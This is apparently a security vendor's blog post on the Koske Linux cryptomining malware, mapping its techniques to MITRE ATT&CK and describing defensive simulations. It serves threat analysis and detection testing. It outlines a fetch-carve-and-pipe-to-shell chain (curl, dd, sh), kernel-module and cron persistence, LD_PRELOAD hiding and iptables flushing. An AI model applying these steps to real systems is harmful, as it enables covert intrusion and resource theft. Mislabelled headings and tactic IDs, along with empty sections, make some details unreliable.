Explaining the AI-Assisted Koske Linux Cryptomining Malware Hidden in JPEGs

Mustang Panda Threat Group Overview

Koske is a 2025 Linux cryptomining campaign that represents the next evolution of AI-assisted malware: stealthy, modular, and highly adaptive. Unlike many past cryptominers, Koske shows characteristics that point to large language model (LLM) assistance in its development, its modular structure, unusually clean code, and adaptive logic suggest automation and machine-aided design rather than purely manual craftsmanship.

The result is a campaign that blends multiple techniques to maximize impact while minimizing visibility. Koske conceals its payloads inside benign-looking images, ensures persistence through layered mechanisms, tampers with network defenses, and hijacks both CPU and GPU resources for cryptomining. Its sophistication reflects how adversaries are beginning to leverage AI not just to generate code but to refine malware into something more resilient, harder to detect, and more efficient.

In this blog, we’ll break down the tactics, techniques, and procedures (TTPs) Koske employs, map them to the MITRE ATT&CK framework, and show how Picus simulates these behaviors to help defenders validate detection and close visibility gaps before attackers can exploit them.

Tactics, Techniques, and Procedures (TTPs) of the Koske Cryptomining Campaign

Execution (ATT&CK TA0007)

MITRE T1059.004 - Unix Shell

Koske malware is known to deliver polyglot files that masquerade as benign media, such as JPEG images, but contain appended shell payloads. By downloading the file from a remote server and skipping to the embedded payload using utilities like dd, adversaries can directly pipe the hidden script into /bin/sh for execution.

This method is effective because the carrier file looks harmless to the user and many security tools, while the attacker-controlled script is only revealed and executed at runtime. Campaigns attributed to Koske have relied on this approach to stage second-phase payloads without leaving obvious artifacts on disk.

How Does Picus Simulate This Behavior?

Picus simulates this execution flow to validate whether defenses can detect and prevent execution of embedded payloads. The simulation replicates the adversary’s behavior by fetching a controlled polyglot file, carving the appended script section with dd, and executing it inline through the Unix shell. 

All output is captured for verification, ensuring defenders can test their visibility into this multi-stage technique.

• curl / wget: Retrieves the hosted polyglot JPEG.
• -H 'Accept-Encoding: identity': Ensures the byte offset remains consistent by preventing compression.
• dd bs=1 skip=2422200: Skips the image portion of the file and carves out the hidden payload beginning at the specified offset.
• env -i PATH=/usr/bin:/bin sh -s: Executes the carved script within a minimal environment, mimicking attacker tradecraft.
• Output redirection: Writes results into output.txt for validation and forensic checks.

This simulates adversarial use of polyglot payloads to bypass naïve file inspection and directly invoke malicious scripts.

This step searches for a benign marker string included in the simulated payload to confirm that execution reached the intended stage, enabling defenders to verify whether controls generated telemetry or alerts, while also providing an observable to help tune SIEM and EDR detection pipelines for suspicious process chains such as curl|dd|sh or wget|dd|sh.

Persistence (ATT&CK TA0003)

MITRE T1547.006 - Kernel Modules and Extensions

Persist via Kernel Object File using RC Scripts

Adversaries frequently abuse Linux startup scripts to ensure that malicious kernel modules are loaded automatically at boot. 

By inserting insmod commands into initialization files such as /etc/rc.local, /etc/rc.d/rc.local, or /etc/rc.modules, attackers can guarantee persistence across reboots without user interaction. 

Malicious modules often masquerade under legitimate-sounding names, making them harder to distinguish from genuine drivers. 

In campaigns attributed to Koske malware, operators were observed embedding backdoor modules under innocuous names (e.g., “intel_audio.ko”) and modifying multiple startup locations to maximize reliability. Once these modules are triggered during system initialization, adversaries gain stealthy and long-term kernel-level control.

How Does Picus Simulate This Behavior?

Picus simulates this persistence mechanism to validate whether defenses detect and prevent kernel module loading through startup script modification. 

Instead of using a real malicious module, Picus generates a harmless kernel object and appends insmod execution lines into multiple startup locations. This safe emulation enables defenders to confirm whether their monitoring tools capture suspicious attempts to alter critical initialization files.

MITRE T1037.004 - RC Scripts

Persisting with Boot or Logon Scripts via RC Scripts

Adversaries may achieve persistence on Unix-like systems by leveraging RC (run command) scripts, which are executed during system boot or user logon. 

By inserting malicious commands into these scripts, attackers can ensure their payloads execute automatically without user interaction. 

This method blends into normal system behavior, as RC scripts are widely used for legitimate service initialization. In observed Koske campaigns, operators were seen adding lightweight stagers or module loaders into RC scripts, allowing them to regain execution privileges after reboots while appearing as part of normal startup routines.

How Does Picus Simulate This Behavior?

Picus simulates this persistence mechanism by creating a benign RC script that represents how adversaries would insert malicious logic into startup routines. 

The script is safely generated and placed into the working directory, allowing defenders to validate whether their controls detect unauthorized modifications to boot or logon scripts.

MITRE T1543.002 - Systemd Service

Creating Systemd Service like Koske

Adversaries can establish persistence on Linux systems by creating or modifying systemd services, which are used to manage how processes start at boot. By registering a malicious service under a legitimate-looking name, attackers ensure their payload executes automatically whenever the system initializes. This technique is stealthy because systemd is the default service manager on most modern Linux distributions, and malicious entries can easily blend in with legitimate service definitions. 

In Koske malware campaigns, operators were observed creating custom systemd services to load stagers or second-phase payloads, allowing them to maintain execution with minimal user awareness.

How Does Picus Simulate This Behavior?

MITRE T1053.003 - Cron

Persisting via Cron Jobs

Adversaries often abuse cron jobs on Unix-like systems to achieve persistence by scheduling malicious commands or scripts to execute at fixed intervals. Since cron is a native task scheduler widely used by administrators, attacker-created jobs can easily blend in with legitimate scheduled tasks. 

In campaigns linked to Koske malware, operators have been observed inserting cron entries that repeatedly fetched or executed payloads, ensuring continuous access even if initial footholds were disrupted. By leveraging cron, adversaries guarantee recurring execution without requiring user interaction, making it a reliable persistence mechanism.

How Does Picus Simulate This Behavior?

Picus simulates adversarial use of cron by inserting a harmless scheduled task into the crontab. The job mimics how attackers persist by running code at regular intervals, but instead of executing malicious logic, it outputs a benign marker string. 

This safe emulation allows defenders to validate whether their monitoring solutions detect unauthorized modifications to cron jobs and recurring scheduled execution.

Defense Evasion (ATT&CK TA0005)

MITRE T1574 - Hijack Execution Flow

Hijacking Readdir Function via LD_PRELOAD

Adversaries may abuse the LD_PRELOAD environment variable on Unix-like systems to hijack execution flow by forcing the dynamic linker to load a malicious shared object (.so) before other libraries. This allows attackers to intercept and modify standard library calls, effectively manipulating how legitimate programs behave. 

For example, by hooking functions such as readdir(), adversaries can hide files or processes from directory listings, enabling stealthy persistence and defense evasion. 

In Koske malware campaigns, operators were observed leveraging LD_PRELOAD hijacking to conceal malicious artifacts while maintaining execution, ensuring their presence on the system remained undetected by administrators and security tools.

How Does Picus Simulate This Behavior?

Picus simulates this technique by using a benign shared object hook to intercept directory listing calls. Instead of hiding or executing malicious payloads, the simulation safely modifies output during ls execution, mimicking adversary tradecraft without causing harm. 

This allows defenders to validate whether their controls detect suspicious use of the LD_PRELOAD variable and the presence of unauthorized library injection.

MITRE T1562.004 - Disable or Modify System Firewall

Flushing Iptables Rules

Adversaries may disable or modify host-based firewalls to weaken defenses and allow unrestricted network communication. On Linux systems, this is often achieved by flushing iptables rules, setting default policies to ACCEPT, and removing existing chains. By doing so, attackers ensure that no inbound or outbound traffic is blocked, opening the way for further exploitation, lateral movement, or persistent C2 communication. 

In Koske malware campaigns, operators were observed tampering with iptables configurations to guarantee that malicious payloads could communicate freely, bypassing host-level network restrictions.

How Does Picus Simulate This Behavior?

Command and Control (ATT&CK TA0011)

MITRE T1574 T1090.001 - Internal Proxy

Discovering System Proxy Settings

Adversaries may attempt to discover or abuse system proxy settings to route their command-and-control (C2) traffic through existing network infrastructure. By leveraging trusted internal proxies, attackers can blend malicious traffic with legitimate enterprise flows, making detection more difficult. A common step during reconnaissance is to check local configuration files for proxy variables that dictate how outbound connections are handled. 

In Koske malware campaigns, operators were observed parsing user and system-level configuration files such as .bashrc, .bash_profile, and /etc/environment to identify proxy settings that could later be abused to tunnel or redirect traffic covertly.

How Does Picus Simulate This Behavior?

Picus simulates this discovery technique by safely inspecting common configuration files for proxy-related entries. Instead of abusing or redirecting traffic, the simulation simply queries environment settings, mimicking the reconnaissance phase of adversaries. 

This allows defenders to validate whether their security controls generate telemetry or alerts when suspicious processes attempt to enumerate system proxy settings.

Impact (ATT&CK TA0040)

Adversaries often deploy cryptocurrency mining malware such as XMrig to abuse compromised resources for financial gain. To evade detection, attackers may distribute miners in encrypted or compressed formats, only decrypting and executing them once inside the target environment. This not only conceals the payload during delivery but also helps bypass static analysis and network inspection tools. 

In Koske malware campaigns, operators were observed using OpenSSL-encrypted archives to stage miners, which were decrypted, unpacked, and executed with elevated permissions to maximize persistence and resource hijacking.

How Does Picus Simulate This Behavior?

Picus simulates this impact technique by using a benign encrypted XMrig sample that is decrypted, unpacked, and staged in a temporary directory. 

Instead of running the miner, the simulation only prepares the binary and confirms its presence, providing defenders with safe observables to validate whether their controls detect activities associated with miner deployment, such as decryption, archive extraction, file relocation, and permission changes.

How Picus Helps Defend Against AI-Assisted Koske Linux Cryptomining Attacks?

The Picus Security Validation Platform safely simulates Koske Malware’s techniques using its continuously updated Threat Library, identifying blind spots across EDRs, NGFWs, and SIEMs before attackers can exploit them. 

You can also test your defenses against hundreds of other Linux malware variants, such as UNC3886, APT31, Melofee malware campaigns within minutes with a 14-day free trial of the Picus Platform.